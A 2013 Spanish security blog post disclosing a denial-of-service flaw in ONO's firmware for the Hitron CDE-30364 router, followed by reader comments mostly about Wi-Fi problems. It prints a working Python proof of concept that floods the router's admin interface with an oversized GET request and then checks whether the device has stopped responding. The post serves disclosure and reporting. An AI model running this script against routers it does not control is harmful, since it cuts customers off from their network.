jueves, 17 de octubre de 2013

Nueva vulnerabilidad en firmware de ONO para el router Hitron CDE-30364

Matías Mingorance Svensson ha descubierto un nuevo problema de seguridad en el firmware proporcionado por ONO para el router Hitron CDE-30364. En esta ocasión un atacante podría provocar una denegación de servicio y causar que el dispositivo dejase de responder.

Router Hitron CDE-30364 proporcionado por ONO
Tan sólo unas semanas después de descubrir múltiples vulnerabilidades Cross-Site Request Forgery (CSRF) en el firmware de ONO para el router Hitron CDE-30364, Matías Mingorance Svensson ha publicado un nuevo fallo de seguridad en el dispositivo que esta empresa de telecomunicaciones proporciona a sus clientes con conexiones de 30, 50 y 100 megas.

Se trata de un error de falta de comprobación de límites de los datos proporcionados en las peticiones HTTP realizadas mediante el método 'GET'. Aprovechar este fallo podría conducir a una denegación de servicio (DoS) ya que el dispositivo deje de responder.

Para ilustrar la vulnerabilidad Matías propone la siguiente prueba de concepto escrita en python. En ella se realiza una petición que contiene 100.010 caracteres 'A' a la interfaz de administración del dispositivo en el puerto 80 (la dirección IP del dispositivo se pasa como argumento al lanzar el script), tras la cual se intenta realizar una conexión a la interfaz web del router para comprobar si el ataque ha tenido éxito.

import httplib
import socket
import time
import sys

#Envío de la petición GET
print "Enviando la petición al router ONO Hitron CDE-30364...\n"
connct = httplib.HTTPConnection(sys.argv[1],80)
connct.request("GET", "AAAAAAAAAA"*10001)
connct.close()

#Comprobación
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(5)
try:
  s.connect((sys.argv[1], 80))
  s.shutdown(2)
  print "Ataque fallido!\n"
except:
  print "Ataque con éxito! La interfaz de administración del router es inaccesible!\n"



Esta vulnerabilidad se ha comprobado en dispositivos con firmware 3.1.0.8-ONO, aunque otras versiones también podrían verse comprometidas.

Más información:

ONO Hitron CDE-30364 Router Denial Of Service

Múltiples CSRF en firmware de ONO para el router Hitron CDE-30364

ONO > Hitron CDE-30364



Juan José Ruiz

11 comentarios:

  1. Comentaba Matías, en septiembre, que encontró "otra manera de tumbar el router, y que sólo se puede solucionar llamando al servicio técnico".
    ¿Se trataba de esto?
    Un cordial saludo.

    ResponderEliminar
    Respuestas
    1. Buenas, Sí, le acabo de enviar por el mail a Juan José el nuevo exploit. Pendiente de que lo publiquen :)

      Eliminar
  2. Hola,

    No anónimo; Con este es suficiente con reiniciar el router. Sobre el otro todavía estoy en ello, ya que en su momento lo hice de manera poco ortodoxa.

    Un saludo,
    Matías

    ResponderEliminar
  3. Matias mi router, no engancha la red wiffi, està continuamente obtener direccion de red, y luego falla....què puede ser?

    ResponderEliminar
  4. Matias;buenas noches es posible cambiar la ip del router cd30364 de Ono, con Telnet?

    ResponderEliminar
  5. Yo también tengo problemas con el wifi desde finales d septiembre d éste año, cómo puedo solucionarlo?

    ResponderEliminar
  6. Lo q no me funciona bien es el wifi, me dice continuamente q estoy fuera d rango. Cuando éso no es verdad, es q ni poniéndome al lado del router! No cojo wifi con ningún teléfono, ni portátil, ni tablet, cuando antes no tenía ningún problema!

    ResponderEliminar
  7. A mi me ocurre lo mismo, solo me funciona el wifi cuando encendido el portatil, compruebo que no se conecta al router (tampoco el movil se conecta a la wifi), y reinicio el equipo. Entonces si funciona en el portatil y el movil. El modelo de router es el nuevo de ono, que es negro con agujeros. ¿Alguien me puede ayudar?

    ResponderEliminar
  8. A mi me pasa exactamente igual. Pero he descubierto cuándo pasa, ya que yo pensaba que era totalmente aleatorio. Pues bien a mi me ocurre cuando el vecino conecta el equipo de musica.
    Es enchufarlo y todos mis equipos pierden la conexión, la red sigue siendo visible, pero es imposible conectar.
    Un saludo

    ResponderEliminar
  9. A mi no me funciona el exploit. Me da error en la linea 13, cuando la linea 13 es solo un comentario, en concreto este #Envío de la petición GET. Y no caigo en que puede ser.

    ResponderEliminar
  10. Lo del equipo de música lo corroboro xD, yo tmb tengo este truño de router en mi cuarto y un sistema de sonido 5.1 con los altavoces inalambricos por wireless... y si el wifi del router, ya d por si es caca de la vaca, cuando enciendo los altavoces... se comen la señal.. nadie en mi casa puede tener wifi :/.. la verdad, lamentable este router y las imposiciones d ono

    ResponderEliminar